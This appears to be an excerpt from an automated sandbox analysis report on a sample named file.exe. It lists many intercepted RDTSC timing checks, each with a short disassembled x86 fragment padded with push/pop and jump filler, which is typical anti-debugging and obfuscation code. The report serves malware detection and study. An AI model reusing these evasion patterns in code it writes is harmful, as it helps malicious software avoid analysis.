Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 717113 second address: 71718E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F56AD341B1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F56AD341B18h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+124861A5h] 0x0000002b mov dword ptr [ebp+124510C4h], esi 0x00000031 add eax, ebx 0x00000033 jmp 00007F56AD341B29h 0x00000038 pushad 0x00000039 movzx edi, cx 0x0000003c xor eax, dword ptr [ebp+122D38BBh] 0x00000042 popad 0x00000043 nop 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F56AD341B22h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 765424 second address: 765437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F56ACB76F36h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 765437 second address: 76543B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76543B second address: 76545A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F3Eh 0x00000007 jng 00007F56ACB76F36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76545A second address: 765479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 765479 second address: 76547D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76547D second address: 765498 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F56AD341B25h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 765602 second address: 765610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F56ACB76F38h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 767862 second address: 767878 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F56AD341B16h 0x00000008 jnc 00007F56AD341B16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 767878 second address: 767885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E0D4 second address: 76E0DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E261 second address: 76E265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E265 second address: 76E279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F56AD341B1Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E279 second address: 76E285 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F56ACB76F36h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E285 second address: 76E28A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E28A second address: 76E298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F56ACB76F36h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E298 second address: 76E2A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E2A2 second address: 76E2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007F56ACB76F48h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E2B3 second address: 76E2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76E6F6 second address: 76E6FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76EF94 second address: 76EFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F56AD341B1Eh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76FB82 second address: 76FB92 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F56ACB76F3Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76FB92 second address: 76FB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76FB96 second address: 76FBB1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F56ACB76F46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 774D1C second address: 774D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F56AD341B16h 0x0000000a popad 0x0000000b jno 00007F56AD341B18h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 774D2F second address: 774D3E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F56ACB76F3Ah 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 774D3E second address: 774D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 773D78 second address: 773DB1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007F56ACB76F45h 0x0000000f jmp 00007F56ACB76F3Dh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 jmp 00007F56ACB76F48h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 773DB1 second address: 773DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56AD341B24h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 773EFE second address: 773F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 774270 second address: 77427A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F56AD341B16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7743A0 second address: 7743A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7743A4 second address: 7743CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F56AD341B1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jnp 00007F56AD341B16h 0x00000016 jmp 00007F56AD341B1Bh 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7743CD second address: 7743DC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F56ACB76F3Ah 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 774552 second address: 77455D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77455D second address: 774564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 774564 second address: 77459A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F56AD341B20h 0x00000008 jmp 00007F56AD341B22h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F56AD341B1Eh 0x00000017 jp 00007F56AD341B16h 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77459A second address: 7745D2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F56ACB76F4Fh 0x00000008 jmp 00007F56ACB76F49h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F56ACB76F45h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77472F second address: 774736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7794F3 second address: 7794F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6D4B37 second address: 6D4B3C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 780B34 second address: 780B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 780B3B second address: 780B45 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F56AD341B22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 780B45 second address: 780B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 780B4B second address: 780B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 780B52 second address: 780B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7810D8 second address: 7810DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7810DD second address: 7810FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F56ACB76F48h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7810FB second address: 7810FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 781583 second address: 781589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 781589 second address: 781591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 781857 second address: 78185B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78185B second address: 781863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 781F1F second address: 781F23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 781F23 second address: 781F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 781F29 second address: 781F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 781F2F second address: 781F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7825F4 second address: 78260A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F41h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787C63 second address: 787C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787C67 second address: 787C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a ja 00007F56ACB76F36h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 jbe 00007F56ACB76F36h 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787C82 second address: 787C87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787C87 second address: 787C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787DFB second address: 787E00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C55B0 second address: 6C55BF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F56ACB76F3Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C55BF second address: 6C55CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6C55CE second address: 6C55F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F56ACB76F48h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BB5A second address: 78BB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BB5E second address: 78BBA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56ACB76F47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F56ACB76F44h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F56ACB76F42h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BBA6 second address: 78BBAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79762E second address: 797632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 797632 second address: 79763C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F56AD341B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7977A6 second address: 7977BA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F56ACB76F36h 0x00000008 ja 00007F56ACB76F36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7977BA second address: 7977BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7977BE second address: 7977C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7977C4 second address: 7977CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7977CD second address: 7977D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 799CF5 second address: 799CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 799CF9 second address: 799D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 799D07 second address: 799D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CFB0F second address: 6CFB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CFB17 second address: 6CFB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7998A9 second address: 7998B6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0D75 second address: 7A0D7F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0D7F second address: 7A0D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A8595 second address: 7A85AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F56AD341B1Ch 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A85AF second address: 7A85CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F56ACB76F3Ch 0x00000009 popad 0x0000000a ja 00007F56ACB76F38h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A85CC second address: 7A85D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A85D2 second address: 7A85D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AB035 second address: 7AB03B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6CDEE7 second address: 6CDF26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F56ACB76F48h 0x00000008 jne 00007F56ACB76F36h 0x0000000e jbe 00007F56ACB76F36h 0x00000014 popad 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jmp 00007F56ACB76F42h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AAE9C second address: 7AAEB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F56AD341B23h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B349C second address: 7B34A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B2262 second address: 7B226A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B238C second address: 7B2390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B2390 second address: 7B23AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F56AD341B24h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B2773 second address: 7B2777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B31F6 second address: 7B31FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6D77 second address: 7B6D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F56ACB76F36h 0x0000000a jno 00007F56ACB76F36h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6D89 second address: 7B6D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6A3D second address: 7B6A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
